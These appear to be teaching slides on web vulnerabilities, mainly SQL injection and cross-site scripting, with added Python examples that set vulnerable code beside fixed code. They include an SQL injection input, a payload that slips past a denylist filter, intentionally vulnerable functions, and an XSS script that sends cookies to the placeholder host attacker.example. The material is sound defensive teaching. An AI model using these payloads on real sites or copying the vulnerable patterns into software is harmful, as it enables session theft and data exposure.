SQL injections and more... PERU
Web application vulnerabilities: Cross Site Scripting (21.5%), SQL Injection (14%), PHP includes (9.5%), Buffer overflows (7.9%)
SQL injections. Cause: no input validation, and untrusted input spliced straight into the query text. How does it work? Example code:
PHP example (vulnerable):
    $wachtwoord = $_POST['wachtwoord'];
    // connect to the DB
    $result = query("SELECT geheimeinfo FROM tabel WHERE wachtwoord='$wachtwoord'");
What happens when "a' OR '1" is entered? The query that reaches the database becomes
    SELECT geheimeinfo FROM tabel WHERE wachtwoord='a' OR '1'
The WHERE clause is now true for every row, so geheimeinfo is returned without knowing any password.
How to prevent it? Escape the $wachtwoord variable with addslashes, or better mysql_real_escape_string, which uses the character set of the open connection (addslashes does not, and is not a reliable defence on its own):
    $wachtwoord = $_POST['wachtwoord'];
    // connect to the DB
    $result = query("SELECT geheimeinfo FROM tabel WHERE wachtwoord='" . mysql_real_escape_string($wachtwoord) . "'");
Caveat: this only helps inside a quoted string literal, and the old mysql_* extension (including mysql_real_escape_string) was removed in PHP 7; prefer the next slide.
How to prevent it? (II) Use prepared statements with the mysqli or PDO MySQL extensions. The value is sent separately from the SQL text, so it can never change the query structure. For example (with mysqli):
    $wachtwoord = $_POST['wachtwoord'];
    // connect to the DB
    $stmt = $DB->prepare("SELECT geheimeinfo FROM tabel WHERE wachtwoord = ?");
    $stmt->bind_param("s", $wachtwoord);
    $stmt->execute();                 // execute(), not execute: the original slide was missing the parentheses
    $stmt->bind_result($geheimeinfo); // bind result columns after execute(), before fetch()
    if ($stmt->fetch()) {
        // OK
    } else {
        // not OK
    }
    $stmt->close();
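To make the three previous slides runnable side by side, here is an added example (not code from the original slides, and in Python with an in-memory SQLite database instead of the slides' PHP and MySQL). The schema, the stored password and the secret are constructed stand-ins; the query text and the "a' OR '1" input are the ones from the slides.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the slide's database: one table 'tabel' with a
    'wachtwoord' and a 'geheimeinfo' column (assumed schema, sample row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tabel (wachtwoord TEXT, geheimeinfo TEXT)")
    conn.execute("INSERT INTO tabel VALUES ('hunter2', 'the secret')")
    conn.commit()
    return conn


def build_sql(wachtwoord):
    """Exactly what the slide's first PHP snippet does: splice the POSTed
    value into the SQL text before the database ever sees it."""
    return "SELECT geheimeinfo FROM tabel WHERE wachtwoord='%s'" % wachtwoord


def lookup_vulnerable(conn, wachtwoord):
    """String concatenation: the input can change the structure of the query."""
    return [row[0] for row in conn.execute(build_sql(wachtwoord))]


def lookup_safe(conn, wachtwoord):
    """The prepared-statement fix: the query text is fixed and the value is
    passed as a parameter (the '?' placeholder), so "a' OR '1" is compared
    literally against the stored password and matches nothing."""
    sql = "SELECT geheimeinfo FROM tabel WHERE wachtwoord=?"
    return [row[0] for row in conn.execute(sql, (wachtwoord,))]


if __name__ == "__main__":
    conn = make_db()
    payload = "a' OR '1"  # the input from the slide
    print(build_sql(payload))                # ... WHERE wachtwoord='a' OR '1'
    print(lookup_vulnerable(conn, payload))  # ['the secret']: WHERE is true for every row
    print(lookup_safe(conn, payload))        # []: the payload is just a wrong password
```

Python's sqlite3 module has no equivalent of mysql_real_escape_string, and none is needed: with parameters the database parses the same query every time, whatever the value contains.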
Validate input! It seemed simple... but as we know: validate input! Don't try to detect what is incorrect (a denylist of bad characters or keywords); check whether the input is correct (an allowlist of what a valid value looks like). See the IBM article.
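The difference between the two approaches, as an added example that is not part of the original slides (Python; the denylist tokens, the username format and the test inputs are all my own constructions, chosen to show why a denylist fails):

```python
import re

# Denylist approach: try to detect what is wrong by removing a few known-bad
# tokens. The list is constructed for this example; any real list is incomplete.
DENYLIST = ("--", "OR", "UNION")


def strip_denylist(value):
    """Remove every occurrence of each denylisted token (case-insensitive).
    A single pass per token can be defeated by nesting the token inside itself:
    'OORR' loses its inner 'OR' and what remains is 'OR' again."""
    cleaned = value
    for bad in DENYLIST:
        cleaned = re.sub(re.escape(bad), "", cleaned, flags=re.IGNORECASE)
    return cleaned


# Allowlist approach: state what a correct value looks like and accept nothing
# else. Here an account name: 1 to 32 letters, digits or underscores (assumed
# format for this example; a password field would not be restricted this way,
# it is protected by the prepared statement instead).
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def is_valid_username(value):
    """True only if the whole string matches the allowed shape."""
    return USERNAME_RE.fullmatch(value) is not None


if __name__ == "__main__":
    attack = "' OORR '1'='1"
    print(strip_denylist(attack))       # ' OR '1'='1  : the filter rebuilt the payload
    print(is_valid_username(attack))    # False        : quotes and spaces are not allowed
    print(is_valid_username("alice_01"))  # True
```

The allowlist rejects the payload without knowing anything about SQL; the denylist needs to know every bad token and every way of hiding one.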
XSS: Cross Site Scripting. 3 kinds of XSS attacks: DOM-based, non-persistent (reflected), persistent (stored)
A short video as an example.
De plot. Mallory posts a message to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can hijack Bob's session and impersonate Bob
DOM-based attack. Mallory sends the URL of a maliciously constructed web page to Alice, using e-mail or another mechanism. Alice clicks on the link. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.
Non-persistent (reflected). Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability, and sends Alice an e-mail, making it look as if it came from Bob (i.e., the e-mail is spoofed). Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.
Persistent (stored). Bob hosts a web site which allows users to post messages and other content to the site for later viewing by other members. Mallory notices that Bob's website is vulnerable to a type 2 (persistent) XSS attack: posted content is stored and later served to other users unescaped. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's webserver without their knowledge. Later, Mallory logs in as other site users and posts messages on their behalf....
How to prevent it? Escaping and filtering (encode user content for the context it is placed in, e.g. HTML-escape it before it goes into the page). Input validation (allowlist, as before). Cookie security (mark the session cookie HttpOnly so a script cannot read it via document.cookie, and Secure so it only travels over HTTPS). Eliminating scripts.
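The stored-XSS scenario and two of the countermeasures (escaping, cookie security) in runnable form, as an added example that is not part of the original slides. It is Python rather than the slides' PHP; the message markup, the attacker host attacker.example and the session id are constructed for this example.

```python
import html
from http.cookies import SimpleCookie

# Constructed payload of the kind Mallory posts: when rendered unescaped it sends
# the reader's cookie to a host under Mallory's control (placeholder hostname).
PAYLOAD = ("<script>new Image().src='https://attacker.example/?c='"
           "+document.cookie</script>")


def render_message_vulnerable(author, body):
    """Stored XSS: the stored text is concatenated straight into the page, so
    the browser parses Mallory's <script> as part of Bob's site."""
    return "<p><b>%s</b>: %s</p>" % (author, body)


def render_message_safe(author, body):
    """Escaping for the HTML body context: <, >, &, " and ' become entities, so
    the browser displays the tags as text and never executes them."""
    return "<p><b>%s</b>: %s</p>" % (html.escape(author, quote=True),
                                     html.escape(body, quote=True))


def session_cookie_header(session_id):
    """Cookie security: HttpOnly hides the cookie from document.cookie (so the
    payload above sends nothing useful even if it does run), Secure keeps it
    off plain HTTP, SameSite=Strict keeps it out of cross-site requests."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_message_vulnerable("Mallory", PAYLOAD))  # contains a live <script>
    print(render_message_safe("Mallory", PAYLOAD))        # &lt;script&gt;... : inert text
    print(session_cookie_header("abc123"))                # Set-Cookie: session=abc123; HttpOnly; ...
```

Escaping is context-specific: html.escape is right for text inside an element body or a quoted attribute; a value placed inside a JavaScript block or a URL needs the encoding for that context instead.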